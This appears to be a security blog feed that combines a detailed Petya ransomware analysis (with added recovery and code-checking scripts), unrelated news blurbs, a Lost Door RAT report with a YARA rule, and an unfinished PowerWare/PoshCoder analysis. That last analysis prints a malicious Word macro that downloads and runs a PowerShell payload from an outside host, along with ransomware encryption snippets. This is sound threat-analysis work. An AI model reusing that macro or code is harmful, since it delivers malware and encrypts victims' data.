
Petya: the two-in-one trojan


Infecting the Master Boot Record (MBR) and encrypting files is nothing new in the world of malicious programs. Back in 1994, the virus OneHalf emerged that infected MBRs and encrypted the disk contents. However, that virus did not extort money. In 2011, MBR blocker Trojans began spreading (Trojan-Ransom.Win32.Mbro) that infected the MBR and prevented the operating system from loading further. The victim was prompted to pay a ransom to get rid of the problem. It was easy to treat a system infected by these blocker Trojans because, apart from the MBR, they usually didn’t encrypt any data on the disk.

Today, we have encountered a new threat that’s a blast from the past. The Petya Trojan (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Petr) infects the MBR preventing normal system loading, and encrypts the Master File Table (MFT), an important part of the NT file system (NTFS), thus preventing normal access to files on the hard drive.

The infection scenario

The people spreading Petya attack their potential victims by sending spam messages containing links that download a ZIP archive. The archive contains the Trojan’s executable file and a JPEG image. The file names are in German (Bewerbungsunterlagen.PDF.exe, Bewerbungsmappe-gepackt.exe), are made to look like resumes for job candidates, and target HR staff in German-speaking countries.


Contents of the archives downloaded from links in spam

The cybercriminals didn’t bother with automatic escalation of privileges – the manifest of the Trojan’s executable file contains the following standard record:


If the user launches the malicious executable file Petya, Windows will show the standard UAC request for privilege escalation. If the system has been properly configured by the system administrators (i.e. UAC is enabled, and the user is not working from an administrator account), the Trojan won’t be able to run any further.

Unfortunately, a user who has the privileges to agree to a UAC request often underestimates the potential risks associated with launching unknown software with elevated rights.

How it works

The executable file and the packer

A Petya Trojan infection begins with the launch of the malicious executable file. The samples of the Trojan that Kaspersky Lab received for analysis are, just like most other malware samples, protected with a customized packer. When the executable file launches, the malicious packer’s code begins to work – it unpacks the malicious DLL Setup.dll into a newly designated RAM area, and then passes control to it.

Cybercriminals typically use packers to avoid detection – circumvent static signatures, trick the heuristic analyzer, etc. While investigating the Petya packer, we noticed an unusual trick used by the cybercriminals.

Cybercriminals often try to create the packer in such a way that a packed malicious executable file looks as similar as possible to a regular legitimate file. Sometimes, they take a legitimate file and substitute part of the code with malicious code. That’s what they did with Petya, with one interesting peculiarity: it was a part of the standard compiler-generated runtime DLL that was replaced with malicious code, while the function WinMain remained intact. The illustration below shows the transition, beginning from the entry point (“start”). As can be seen, the function of unpacking malicious code (which we dubbed “evil”) is called from the legal function __calloc_crt which is part of the runtime code.


Diagram of transitions between the malicious packer’s functions

Why do it that way? Obviously, the creators of the malicious packer were trying to trick an inattentive researcher or automatic analyzers: the file looks legitimate – WinMain doesn’t contain malicious code – so it’s possible that it will be overlooked. Besides, if the breakpoint is set at WinMain during debugging, then the malicious code works (and sends the system into BSOD, as we will discuss later in detail) and execution is over before the breakpoint is even reached.

Kaspersky Lab has detected Petya samples that masquerade as legitimate files written in C/C++ and in Delphi.

The malicious DLL

Setup.dll is a DLL with just one export: _ZuWQdweafdsg345312@0. It is written in C and compiled in Microsoft Visual Studio. The cybercriminals used an implementation of cryptographic algorithms available in the public library mbedtls (formerly polarssl). Setup.dll is not saved to the hard drive as a separate file, but always remains in the RAM.

When Setup.dll receives control, it decrypts the data contained in the section ‘.xxxx’ and then proceeds to infect the victim computer.


The encrypted ‘.xxxx’ section containing data


Fragment of the decrypted data from the ‘.xxxx’ section

At a higher degree of abstraction, the actions of Setup.dll come down to the following:

  1. Re-write the boot record on the hard drive with its own malicious loader;
  2. Generate a key, infection ID and other auxiliary information, and save them to the hard drive;
  3. Cause a system abort and reboot, thereby passing control to the malicious loader.

Now let’s look in detail at how all of this is implemented in the Trojan. But before doing so, we need to define the terminology used.

Hard disk sector – the minimum addressable unit of a hard drive, typically 512 bytes.

Master boot record (MBR) – the code and the data written to Sector 0. After hardware is initialized, this code is used to boot the PC. Also, this sector contains the hard disks’ partition table. A disk partitioned with MBR may have up to four primary partitions, and the maximum partition size is ~2.2 TB.

GUID Partition Table (GPT) – a more modern standard of hard drive layout. It supports up to 128 partitions, each up to 9.4 ZB in size (1 ZB = 10^21 bytes).

Now let’s return to the Trojan under review. Setup.dll can infect disks partitioned according to either the older MBR standard or the more modern GPT standard. There are two alternative branches of execution sequences in the malicious program; the choice of execution branch depends on the data in the field PartitionStyle of the structure PARTITION_INFORMATION_EX.


Selection of the execution branch for disk infection, depending on whether the disk has MBR or GPT partitioning

Infecting an MBR disk

When infecting an MBR disk, Setup.dll performs the following actions:

  1. Encrypts sector 0 (the original code and the MBR data) with the simple operation XOR 0x37 (ASCII ‘7’), writes the result to sector 56;
  2. Encrypts sectors 1-33 with the same operation XOR 0x37;
  3. Generates configuration data for the malicious loader, writes them to sector 54;
  4. Creates the verification sector 55 populated with the repeating byte 0x37;
  5. Copies the disk’s NT signature and the partition table saved from the original MBR into its own first-level loader; writes first-level malicious code to sector 0 of the disk, and writes second-level code to sectors 34-50 (referred to here as the malicious loader);
  6. Calls the function NtRaiseHardError, which causes the operating system to crash (BSOD – the ‘blue screen of death’).

When an MBR disk has been infected, the beginning of the disk has the following structure:

| Number of sector | Content |
|---|---|
| 0 | First-level malicious loader |
| 1 – 33 | Encrypted sectors 1-33 (XOR 0x37) |
| 34 – 50 | Second-level malicious code |
| 54 | Configuration sector of the malicious program |
| 55 | Verification sector (populated with byte 0x37) |
| 56 | Encrypted original MBR code (XOR 0x37) |

Infecting a GPT disk

When infecting a GPT disk, Setup.dll performs more actions:

  1. Based on the Primary GPT Header data, it obtains the address of the GPT header copy;
  2. Encrypts the GPT header copy with XOR 0x37;
  3. Performs all the actions that are performed when encrypting an MBR disk.

When a GPT disk has been infected, the beginning of the disk has the following structure:

| Number of sector | Content |
|---|---|
| 0 | First-level malicious loader |
| 1 – 33 | Encrypted sectors 1-33 (XOR 0x37) |
| 34 – 50 | Second-level malicious code |
| 54 | Configuration sector of the malicious program |
| 55 | Verification sector (populated with byte 0x37) |
| 56 | Encrypted original MBR code (XOR 0x37) |
| Backup LBA – Backup LBA + 33 | Encrypted copy of GPT Header (XOR 0x37) |

Generation of configuration data

In the configuration sector (sector 54), the Trojan keeps the data it needs to encrypt MFT and decrypt it if the victim pays the ransom. Generation of the configuration data consists of the following steps:

  1. Setup.dll generates a random string that is 16 characters long [1-9, a-x, A-X]; we will call this string password;
  2. Generate a pair of keys: ec_session_priv (a private key, a random large integer number) + ec_session_pub (public key, a point on a standard elliptic curve secp192k1);
  3. Calculate the session secret: session_secret = ECDH (ec_session_priv, ec_master_pub); the cybercriminals’ public key ec_master_pub is contained in the Trojan’s body;
  4. Calculate the aes_key = SHA512(session_secret) – only the first 32 bytes of the hash sum are used;
  5. Encrypt the ‘password’ string by XORing it with the first 16 bytes of ec_session_pub: password_xor = ec_session_pub[0, 15] xor password;
  6. Encrypt the result using AES-256 with the key aes_key: password_aes_encr = AES_enc(password_xor);
  7. Create the array ec_session_data = [ec_session_pub, password_aes_encr];
  8. Calculate base58: ec_session_data_b58 = base58_enc(ec_session_data);
  9. Use the result to calculate SHA256: digest = sha256(ec_session_data_b58);
  10. Create array: ec_data = [check1, check2, ec_session_data_b58], where check1, check2 are bytes calculated by the formulas:
    a = digest[0] & 0xF;
    b = (digest[0] & 0xF) < 10;
    check1 = (digest[0] >> 4) + 0x57 + ((digest[0] >> 4) < 10 ? 0xD9 : 0);
    check2 = a + 0x57 + (b ? 0xD9 : 0);
  11. Based on the ‘password’, create a key for MFT encryption;

    Pseudocode creating a key for MFT encryption

  12. Generate IV – 8 random bytes which will be used during MFT encryption;
  13. Generate infection ID and use it to create “personalized” URLs for ransom payment webpages.

Ultimately, the configuration data structure looks like this:


In C language syntax, this structure can be presented as follows:


This is what the configuration data looks like after it is written to the hard drive:


Note that if the user turns off their computer after this stage and doesn’t switch it on again, only minimum damage will be done, as it is not difficult to decrypt data encrypted with 1-byte XOR. Therefore, a good piece of advice: if you launch an unknown file and your system suddenly crashes, showing a blue screen, you should switch off your computer and get help from a qualified specialist. The specialist should be able to identify a Petya infection and restore the disk sectors encrypted with XOR.
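The pre-reboot layout described above is enough to recognise this stage and undo it offline. The following Python is an added example, not code from the original analysis: it checks a raw image of the first 57 sectors against the MBR-disk table and restores sector 0 and sectors 1-33. The function names, the 55 AA boot-signature and partition-table consistency checks, and the constructed sample image are assumptions of the example; the XORed GPT header copy is not handled.

```python
SECTOR = 512
XOR_KEY = 0x37
VERIFY_SECTOR = 55               # filled with 0x37 until the loader runs
SAVED_MBR_SECTOR = 56            # original sector 0, XOR 0x37
XORED_SECTORS = range(1, 34)     # sectors 1-33, XOR 0x37
DISK_SIG = slice(440, 444)       # NT disk signature inside an MBR
PART_TABLE = slice(446, 510)     # four 16-byte partition entries
BOOT_SIG = slice(510, 512)       # 55 AA


def sector(image, n):
    """Return sector n of a raw image taken from the start of the disk."""
    return image[n * SECTOR:(n + 1) * SECTOR]


def xor37(data):
    """Single-byte XOR; applying it twice gives the input back."""
    return bytes(b ^ XOR_KEY for b in data)


def looks_like_stage1(image):
    """True if the image matches the layout of a disk that has not rebooted yet."""
    if len(image) < (SAVED_MBR_SECTOR + 1) * SECTOR:
        return False
    # After the reboot the loader encrypts sector 55 with Salsa20, so a plain
    # 0x37 fill means only the reversible XOR stage has happened.
    if sector(image, VERIFY_SECTOR) != bytes([XOR_KEY]) * SECTOR:
        return False
    saved = xor37(sector(image, SAVED_MBR_SECTOR))
    current = sector(image, 0)
    # Assumption of this example: the saved copy must be a well-formed MBR and
    # must agree with the disk signature and partition table that the article
    # says are copied into the replacement sector 0.
    return (saved[BOOT_SIG] == b"\x55\xaa"
            and saved[DISK_SIG] == current[DISK_SIG]
            and saved[PART_TABLE] == current[PART_TABLE])


def restore_stage1(image):
    """Return the first 57 sectors with sector 0 and sectors 1-33 put back."""
    if not looks_like_stage1(image):
        raise ValueError("image does not match the pre-reboot layout")
    out = bytearray(image[:(SAVED_MBR_SECTOR + 1) * SECTOR])
    out[0:SECTOR] = xor37(sector(image, SAVED_MBR_SECTOR))
    for n in XORED_SECTORS:
        out[n * SECTOR:(n + 1) * SECTOR] = xor37(sector(image, n))
    return bytes(out)


def make_constructed_sample():
    """Build (clean, infected) images in memory; every byte here is made up."""
    mbr = bytearray(SECTOR)
    mbr[0:4] = b"\xfa\x33\xc0\x8e"             # stand-in for boot code
    mbr[DISK_SIG] = b"\x11\x22\x33\x44"
    mbr[446:462] = bytes.fromhex("8020210007feffff0008000000400600")
    mbr[BOOT_SIG] = b"\x55\xaa"
    clean = bytes(mbr) + bytes((i * 7) % 256 for i in range(56 * SECTOR))
    infected = bytearray(clean)
    loader = bytearray(b"\x90" * SECTOR)        # placeholder bytes, not loader code
    loader[DISK_SIG], loader[PART_TABLE] = mbr[DISK_SIG], mbr[PART_TABLE]
    loader[BOOT_SIG] = b"\x55\xaa"
    infected[0:SECTOR] = loader
    for n in XORED_SECTORS:
        infected[n * SECTOR:(n + 1) * SECTOR] = xor37(sector(clean, n))
    infected[34 * SECTOR:55 * SECTOR] = bytes(21 * SECTOR)   # sectors 34-54: placeholders
    infected[55 * SECTOR:56 * SECTOR] = bytes([XOR_KEY]) * SECTOR
    infected[56 * SECTOR:57 * SECTOR] = xor37(bytes(mbr))
    return clean, bytes(infected)


if __name__ == "__main__":
    clean, infected = make_constructed_sample()
    restored = restore_stage1(infected)
    print("stage 1 layout:", looks_like_stage1(infected))
    print("sectors 0-33 recovered:", restored[:34 * SECTOR] == clean[:34 * SECTOR])
```

Run it against a read-only copy of the disk's first sectors, never the live disk; a False result from looks_like_stage1 means the XOR stage alone does not explain the image.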

If, however, the computer was re-booted, then the Trojan’s third stage kicks in – the malicious code written to sectors 0 and 34–50.

The malicious loader

After rebooting, the code in sector 0 (the first-level loader) gains control. It loads the main second-level malicious code from sectors 34–50 into the memory and passes control to it. This code, in turn, receives information about the hard drives available in the system, searches for the disk where the configuration is written, reads the configuration data from sector 54 and, depending on the value in the field ‘config.state’, begins encryption (if the value is 0) or asks the user to enter the decryption key that they have purchased (if the value is 1).


Fragment of code implementing the Trojan’s logic

Encryption of MFT

The master file table (MFT) is a data structure with information about every file and directory on a volume formatted into NTFS, the file system that is used in all modern versions of Windows. The table contains the service data required to find each file on the disk. It can be compared to a table of contents in a book that tells you on which page to find a chapter. Similarly, MFT indicates which logical cluster a file is located in.

It is precisely this critical area that is attacked by Petya. If the value of ‘config.state’ is equal to 0 during launch, it does the following:

  1. Displays a fake disk check message;
  2. Reads the key ‘config.salsa_key’ from the configuration sector into a local array; sets this field to zero on the disk, and sets the ‘config.state’ field to 1;
  3. Encrypts the verification sector 55 with the stream cipher Salsa20; this sector is populated beforehand with the byte 0x37 (see the section ‘Infecting an MBR disk’ above);
  4. Searches for each partition’s MFT on each connected hard drive;
  5. Encrypts the MFT data with the Salsa20 cipher. Encryption is performed in parts of 8 sectors (i.e. the size of each part is 4 KB). A counter of the encrypted parts is kept in sector 57 of the first disk;
  6. When encryption is over, it triggers a system reboot.

After the reboot, Petya displays an animated image of a flashing red and white skull drawn in ASCII-art style.


If the user presses any key, the Trojan displays a text which tells the victim in no uncertain terms what has happened.

Ransom demand and decryption


On this screen Petya displays links to the ransom payment webpages located in the Tor network (the addresses are specified in config.mal_urls), and the “personal decryption code” which the victim has to enter at either of the above sites. In reality, this “code” is the content of the field ‘config.ec_data’, hyphenated every six characters.
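The check1/check2 formulas from the configuration-data steps look opaque, but in 8-bit arithmetic they are simply the first SHA-256 byte written as two lowercase hex digits, which lets a responder verify that a transcribed or carved “personal decryption code” is intact. The Python below is an added example, not code from the original analysis; the function names, the sample string, and the assumptions that the hash is taken over the ASCII base58 text and that the hyphens are presentation only are the example's own.

```python
import hashlib

BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Constructed stand-in for ec_session_data_b58; not taken from any sample.
SAMPLE_B58 = "7Xk9mQ2vRtYp4HsLw8NcBz3JfGdAe6Uu"


def check_bytes(digest0):
    """check1 and check2 as given in the article, truncated to one byte each."""
    hi, lo = digest0 >> 4, digest0 & 0xF
    check1 = (hi + 0x57 + (0xD9 if hi < 10 else 0)) & 0xFF
    check2 = (lo + 0x57 + (0xD9 if lo < 10 else 0)) & 0xFF
    return chr(check1) + chr(check2)


def make_ec_data(ec_session_data_b58):
    """ec_data = [check1, check2, ec_session_data_b58]."""
    digest = hashlib.sha256(ec_session_data_b58.encode("ascii")).digest()
    return check_bytes(digest[0]) + ec_session_data_b58


def hyphenate(ec_data, group=6):
    """Format ec_data the way the ransom screen shows it."""
    return "-".join(ec_data[i:i + group] for i in range(0, len(ec_data), group))


def validate_code(code):
    """True if the two leading check characters match the rest of the code."""
    ec_data = code.strip().replace("-", "")
    if len(ec_data) < 3:
        return False
    check, body = ec_data[:2], ec_data[2:]
    if any(ch not in BASE58 for ch in body):
        return False          # a mistyped 0/O/I/l can never be valid base58
    return make_ec_data(body)[:2] == check


if __name__ == "__main__":
    code = hyphenate(make_ec_data(SAMPLE_B58))
    print(code, validate_code(code))
```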

So, how do the cybercriminals plan to decrypt MFT, and are they even capable of doing so?

The ‘Key:’ field on this screen accepts a text string from the user. This string is checked for length (a 16-character long string is required), and then the Trojan uses it to calculate a 32-byte ‘salsa_key’ (following the algorithm discussed above in the section ‘Generation of configuration data’). The Trojan then attempts to decrypt the verification sector 55 with this key, and checks that the decrypted sector is completely populated with the byte 0x37. If it is, the key is considered correct, and Petya uses it to decrypt MFT. Then it decrypts all starting sectors encrypted with XOR 0x37, decrypts the original MBR and prompts the user to reboot the computer.

Thus, the correct string to be entered in the ‘Key:’ field is that very same ‘password‘ string that is generated in the first step when the configuration data is created.


Screen message displayed after successful decryption

The question remains: how do the cybercriminals know this string so they can communicate it to a victim who has paid the ransom? No automatic communication with C&C servers is established during the entire infection life cycle. The answer lies in the description of the algorithm for generating configuration data.

The victim is prompted to manually enter their “personal decryption code” ec_data on the ransom payment webpage. The cybercriminal can then perform the following actions:

  1. Decode base58: base58_dec(ec_session_data_b58) = ec_session_data = [ec_session_pub, password_aes_encr]
  2. Calculate session_secret = ECDH(ec_session_pub, ec_master_priv), in accordance with the Elliptic curve Diffie–Hellman properties, where ec_master_priv is a private key known to the Trojan’s creators only;
  3. Calculate aes_key = SHA256(session_secret);
  4. Decrypt AES-256: password_xor = AES_dec(password_encr);
  5. Knowing ec_session_pub, calculate the original password based on password_xor.

The ransom payment webpage

When we visit the Tor site at the URL provided by the Trojan, we see a page that requires a CAPTCHA to be entered, after which the main ransom payment page is loaded. The design of the page immediately catches the eye, with its hammer and sickle and the word ‘ransomware’ in pseudo-Cyrillic. It looks like a USSR parody along the lines of the game Red Alert.


This page displays a countdown clock showing when the ransom price will be doubled, as well as regularly updated links to news and publications related to Petya.

When the ‘Start the decryption process’ button is pressed, you end up on a page that asks you to enter the value of ‘ec_data’, which is now called “your identifier” rather than “your personal decryption code”. It looks like the cybercriminals still haven’t decided what to call this part.


When the user enters this string, the site displays the amount of ransom in BTC, information on how to purchase bitcoins, and the address where the money should be sent.

As well as that, there are two other pages on the website: FAQ and Support.


The FAQ page

The FAQ page is interesting in that it contains false information: in reality, RSA is not used by the Trojan in any way, at any stage of infection.


The Support page

On the Support page, the user is given the option of sending a message to the cybercriminals. One phrase in particular stands out: “Please write your message in english, our russian speaking staff is not always available”. This implies that there is at least one person in the group who speaks Russian.

Geographic distribution

As we noted above, the spam messages target German-speaking victims. KSN statistics clearly show that Germany is the main target for the cybercriminals.


TOP 5 countries attacked by Petya Trojan by the number of attacked users:

|   | Country | Number of attacked users |
|---|---|---|
| 1 | Germany | 579 |
| 2 | China | 19 |
| 3 | India | 8 |
| 4 | Japan | 5 |
| 5 | Russian Federation | 5 |


After analyzing the Petya Trojan, we discovered that it is an unusual hybrid of an MBR blocker and data encryptor: it prevents not only the operating system from booting but also blocks normal access to files located on the hard drives of the attacked system.

Although Petya is noticeably different from the majority of ransomware that has emerged in recent years, it can hardly be described as a fundamentally new development. The ideas behind the Trojan have been seen before in earlier malware; the creators of Petya have simply combined them all in a single creation. That said, it should be acknowledged that it requires a certain degree of technical skill to implement low-level code to encrypt and decrypt data prior to OS booting.

Another interesting peculiarity about Petya is the pseudo-Soviet graphic design on the ransom payment website; the name of the Trojan also fits into the image of a “Russian Trojan” designed by cybercriminals. There is no certainty as to whether the Trojan’s creators originally come from Russia or other former Soviet states; however, the text on the payment page suggests there is at least one Russian speaker in the gang.

Kaspersky Lab’s products protect users from this threat: Petya’s executable files are detected with the verdict Trojan-Ransom.Win32.Petr; in addition, the behavior analyzer proactively detects even unknown versions of this Trojan with the verdict PDM:Trojan.Win32.Generic.

P.S. How to decrypt your data without paying the ransom

On April 8, some independent researchers reported that they had found a method of restoring the password without paying the ransom to the cybercriminals. The method is based on a genetic algorithm; with the 8-byte long IV (stored in configuration sector 54) and the content of the encrypted verification sector 55, you can calculate the value of the password that generates the salsa key, which can then be used to decrypt the MFT.

Posted: 4 May 2016 | 3:39 am

Prisoner takes selfies in police van, posts them to Facebook

"I think there might have been a cell phone involved … Let's just say I found it," Shane Holbrook said of the contraband maybe-phone.

Posted: 4 May 2016 | 2:56 am

Server-jacking exploits for ImageMagick are so trivial, you'll scream

All the more reason to deploy mitigations and patches

Code dive  Samples of booby-trapped image files that exploit ImageMagick to compromise servers and other computers are well and truly out in the open now.…

Posted: 4 May 2016 | 1:21 am

Lost Door RAT: Accessible, Customizable Attack Tool

By Janus Agcaoili 

We recently came across a cyber attack that used a remote access Trojan (RAT) called Lost Door, a tool currently offered on social media sites. What also struck us the most about this RAT (detected as BKDR_LODORAT.A) is how it abuses the Port Forward feature in routers. Using this feature enables remote systems to connect to a specific computer or service within a private local-area network (LAN). However, when used maliciously, this feature allows remote attackers to mask their activities in the network and avoid immediate detection. Because this RAT is easy to customize, even knowledge of the indicators of compromise (which may change as a result) may not be sufficient in thwarting the threat. Easily customizable RATs like Lost Door can be hard to detect and protect against, posing a challenge to IT administrators.

Unlike most attack tools that one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. It’s promoted on social media sites like YouTube and Facebook. Its maker, “OussamiO,” even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT are found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.


Figure 1. Facebook page advertising Lost Door RAT


Figure 2. Blog promoting Lost Door RAT

Besides selling the tool’s source code, OussamiO also offers customers the option to download a compiled sample free of charge. This could be a way to entice users of the said free sample to buy the full version of the RAT for their own attack needs.

We can say that Lost Door RAT’s creator is brazen, in that he relies on the Surface Web to advertise his tool. He does not exert effort to hide his tracks by going into the Deep Web. This is not to say that this tool is not available in the underground, though. While conducting research, we spotted Lost Door builders in different underground markets, such as those in Russia, China, and Brazil since 2009.


Figure 3. Lost Door RAT v8 builder


Figure 4. Lost Door RAT v8 offering in the Brazilian underground market

Easily customizable

Since Lost Door’s emergence in 2007, its creator has released various versions, the latest being Lost®Door E-Lite v9. Like other notorious RATs such as PlugX and Poison Ivy, Lost Door is easy to customize to include new and varying routines. One can choose from a wide array of predefined server builds and other options for propagation, anti-analysis, stealth, and persistence, among others. Cybercriminals can also include worm capabilities, backdoor commands, and even keylogging routines to customize their RATs; both the Facebook and Blogspot pages where the RAT is offered have step-by-step instructions to guide attackers or even newbie cybercriminals in customizing their versions.


Figure 5. Lost Door E-Lite v9 builder

As mentioned earlier, Lost Door leverages the routers’ Port Forward feature, a tactic also used by DarkComet. By abusing this feature, a remote attacker can gain access to the server side of a private network whether at home or in an office. This also means that any malicious traffic or communication can be passed off as normal/internal, thereby helping attackers mask their C&C address, since the server side does not directly connect to it. Instead, they only need the target router’s IP address and access to its open ports (after configuring it to port forward network traffic). Using Port Forward feature also evades network monitoring, as it only connects to an internal/router IP address. Our analysis also shows that this RAT connects to an internal IP address, 192[.]168[.]1[.]101 via port 9481. Both IP address and port can be customized through the builder as well.

Other features of the latest Lost Door include printing of files via the remote printer, executing apps, and gathering information from the Clipboard memory. This RAT also supports different languages: English, Arabic, French, Spanish, Polish, Italian, and Swedish.  In the Blogspot page, OussamiO mentions that if anyone wishes to add another language, they can translate the English version and share the link to the Facebook fan page of Lost Door.


Because this threat is customizable, IT administrators may find it hard to detect on their network due to the changing indicators of compromise (IoC). We listed the following unique strings we gathered that can serve as a starting point in detecting Lost Door RAT:

In addition, the following is the YARA rule for this threat.

rule lodorat_code
{
    meta:
        author = "Trend Micro, Inc."
        description = "system infected with lodorat"
        in_the_wild = true

    strings:
        // Branding strings left by the builder
        $s1 = "OussamiO" wide ascii
        $s2 = "Welcome To Lost Door" wide ascii nocase
        $s3 = "E-Lite v9" wide ascii nocase
        $s4 = "We Control Your Digital Worlds"

        // Shutdown command, removable-drive copy and P2P share folders
        $a1 = /shutdown.{0,5}(-s|-r).{0,5}[0-9]*/i
        $a2 = /(D:|E:|F:)\\Music.exe/i
        $a3 = "C:\\Program Files\\LimeWire"
        $a4 = "C:\\Program Files\\eMule"
        $a5 = "C:\\Program Files\\Morpheus"
        $a6 = "C:\\Program Files\\Bearshare"
        $a7 = "C:\\Program Files\\Kazaa"
        $a8 = "C:\\Program Files\\Ares"

        // Registry policies that disable Task Manager and registry tools
        $r1 = /CurrentVersion\\Policies\\System\\(DisableTaskMgr|DisableRegistryTools)/i

    condition:
        any of ($s*) and (2 of ($a*) or $r1) or
        2 of ($s*)
}

Early detection of Lost Door RAT can prevent dire consequences like information theft and further infection in the enterprise network. We protect our users and their systems from the dangers this threat may pose via Trend Micro™ Deep Discovery. Its Sandbox with Script Analyzer can detect and analyze Lost Door RAT. Our endpoint products such as Trend Micro™ Security, Smart Protection Suites, and Worry-Free Business Security can detect this RAT as well.

With additional analysis from Joey Costoya, Lion Gu, Rhena Inocencio, and Fernando Merces

Post from: Trendlabs Security Intelligence Blog - by Trend Micro


Posted: 3 May 2016 | 12:00 pm

PowerWare or PoshCoder? Comparison and Decryption

PowerWare was brought to my attention by Carbon Black via their blog post. PowerWare is downloaded by a malicious macro-enabled Microsoft Word document that is distributed via a phishing email campaign. The malicious document in question attempts to convince the user to enable macros by informing them that the file is protected by Microsoft Office. This, of course, is a farce. Once the macro is enabled, the PowerWare payload will be downloaded and executed. PowerWare, unfortunately, is hitting healthcare providers.

Figure 1: Screenshot of the macro-enabled malicious Microsoft Word document tricking the user into enabling macros

Using olevba.py from oletools, we can extract the macro from the aforementioned document for analysis.

Private Sub Document_Open()
    Dim CGJKIYRSDGHJHGFFG As String
    CGJKIYRSDGHJHGFFG = "cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa[.]in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"
    Shell CGJKIYRSDGHJHGFFG, 0
    MsgBox ("Unreferenced library required")
End Sub

From the output above, we can see when enabled, the macro intends to run this PowerShell command:

"cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa.in/file[.]php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"

It uses “cmd” to launch “Powershell.exe,” because on some systems, calling the executable directly is blocked. The command also includes some minor obfuscation, such as splitting PowerShell.exe into bite-sized chunks and mixing upper and lower case. In addition, the command attempts to bypass the Execution Policy and not use any profiles the system may have set to be used by default. It then downloads the payload from skycpa[.]in to a temporary directory as Y.ps1 and then executes it.
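The literal splitting and mixed case described above are easy to undo before matching. As an added example (not from the original post), the Python below folds VBA string concatenation in olevba output and then looks for the download-and-run indicators; the function names, the indicator list and the sample line with its placeholder URL are assumptions of the example.

```python
import re

# Constructed sample modelled on the macro line above; the URL is a placeholder.
SAMPLE = r'''CGJ = "cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"'''

# A VBA string literal ("" is an escaped quote), a concatenation operator,
# whitespace, or any other single character.
TOKEN = re.compile(r'"(?:[^"]|"")*"|[+&]|\s+|.', re.S)

INDICATORS = {
    "execution_policy_bypass": re.compile(r"-executionpolicy\s+bypass", re.I),
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.I),
    "no_profile": re.compile(r"-noprofile", re.I),
    "web_download": re.compile(r"net\.webclient\)?\.downloadfile", re.I),
    "runs_script_from_temp": re.compile(r"-file\s+%temp%\\", re.I),
}
NORMAL_CASINGS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}


def fold_concatenation(line):
    """Join string literals connected by + or & into one string per run."""
    runs, current, pending_op = [], None, False
    for tok in TOKEN.findall(line):
        if len(tok) >= 2 and tok.startswith('"') and tok.endswith('"'):
            text = tok[1:-1].replace('""', '"')
            if current is not None and pending_op:
                current += text               # literal + literal: same run
            else:
                if current is not None:
                    runs.append(current)
                current = text
            pending_op = False
        elif tok in "+&" and current is not None:
            pending_op = True
        elif tok.isspace():
            continue
        else:                                 # variable, call, etc. ends the run
            if current is not None:
                runs.append(current)
            current, pending_op = None, False
    if current is not None:
        runs.append(current)
    return runs


def analyse_macro_line(line):
    """Return the set of findings for one line of extracted macro source."""
    findings = set()
    raw_hits = len(re.findall(r"powershell", line, re.I))
    for cmd in fold_concatenation(line):
        hits = re.findall(r"powershell", cmd, re.I)
        if not hits:
            continue
        findings.add("launches_powershell")
        if len(hits) > raw_hits:              # name only appears after folding
            findings.add("name_split_across_literals")
        if any(h not in NORMAL_CASINGS for h in hits):
            findings.add("mixed_case_name")
        findings.update(n for n, rx in INDICATORS.items() if rx.search(cmd))
    return findings


if __name__ == "__main__":
    for finding in sorted(analyse_macro_line(SAMPLE)):
        print(finding)
```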

PowerWare based on PoshCoder

Upon examination of the PowerShell file that was downloaded, you may notice that the programming logic looks familiar. PowerWare seems to be heavily based on PoshCoder, the ransomware that rose to infamy due to the fact it destroyed encrypted data using a logic based programming flaw. The programming style and flow is similar enough that some may even argue that it's a variant of PoshCoder and not a totally new PowerShell ransomware family. The following are some of their major similarities:

1. Both incorporate the use of the RijndaelManaged class. The use of that class itself is not uncommon. However, if you examine the usage of the class, you will notice that the two are quite similar from the key initialization to the padding and mode choice. The exception is their Initialization vector (IV).

Excerpt from PoshCoder Sample

$XlowQsiRsKORgfR = new-Object System.Security.Cryptography.RijndaelManaged
$XlowQsiRsKORgfR.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $BchjdRgasjcThsjd, $UxjcRgasjfvRsj, 5).GetBytes(32)
$XlowQsiRsKORgfR.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("XlowQsiRsKORgfRjBMPLmCamEMyFRlWfsgTgh") )[0..15]
$XlowQsiRsKORgfR.Padding="Zeros"
$XlowQsiRsKORgfR.Mode="CBC"

Excerpt from PowerWare

$Bnx8Khahs3Hjx96 = new-Object System.Security.Cryptography.RijndaelManaged
$Bnx8Khahs3Hjx96.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $GBCSWHJKIYRDVHH, $VGHKJJGFERHJJGSDQWD, 5).GetBytes(32)
$Bnx8Khahs3Hjx96.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$Bnx8Khahs3Hjx96.Padding="Zeros"
$Bnx8Khahs3Hjx96.Mode="CBC"

